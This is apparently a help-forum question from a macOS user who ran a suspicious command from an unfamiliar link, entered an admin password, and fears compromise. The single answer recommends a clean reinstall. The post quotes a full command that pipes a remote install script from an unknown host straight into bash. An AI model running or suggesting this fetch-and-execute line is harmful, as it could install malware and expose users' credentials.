I recently came across a command and ran it in the terminal: /bin/bash -c "$(curl -fsSL https://ctktravel.com/get17/install.sh)" from a link I found, which is https://immokraus.com/get17.php. After running it, I had to enter my admin password. Given my lack of tech skills, I'm worried that the script may have been malicious. Is there any way for me to check what was downloaded and executed? So far, I haven't noticed any changes on my machine, but I'm anxious it might be compromised somehow. I realize I made a huge mistake by running that code. Any help would be appreciated!
1 Answer
Yeah, you definitely ran some sketchy stuff. The script you mentioned isn't even accessible anymore, which is a red flag. I recommend doing a clean install of macOS ASAP. When you're back up, only use files from a safe backup like iCloud. It's super important to be cautious with those commands!
Before you reinstall, it might be a good idea to disconnect from the internet to prevent any further issues.